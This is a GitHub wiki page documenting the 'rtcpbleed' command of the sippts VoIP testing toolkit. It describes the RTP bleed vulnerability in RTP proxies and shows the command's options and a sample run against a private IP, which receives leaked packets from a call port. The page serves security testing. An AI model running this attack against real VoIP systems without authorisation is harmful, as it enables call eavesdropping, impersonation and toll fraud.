-
Notifications
You must be signed in to change notification settings - Fork 80
Command rtcpbleed
Jose Luis Verdeguer edited this page May 16, 2024
·
1 revision
The RTP bleed Bug is a serious vulnerability in a number of RTP proxies. This weakness allows malicious users to inject and receive RTP streams of ongoing calls without needing to be positioned as man-in-the-middle. This may lead to eavesdropping of audio calls, impersonation and possibly cause toll fraud by redirecting ongoing calls.
More info about the vulnerability: https://www.rtpbleed.com/
$ sippts rtcpbleed -h
Target:
-i IP Target IP address
Other options:
-s PORT Start port of the host (default: 10001)
-e PORT End port of the host (default: 20001)
-d DELAY Delay for timeout in microseconds (default: 1)
-h, --help Show this help
$ sippts rtcpbleed -i 192.168.1.1
[!] Target IP: 192.168.1.1
[!] Port range: 10001-20001
[!] Delay between tries: 1 microseconds
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057
received 64 bytes from target port 10057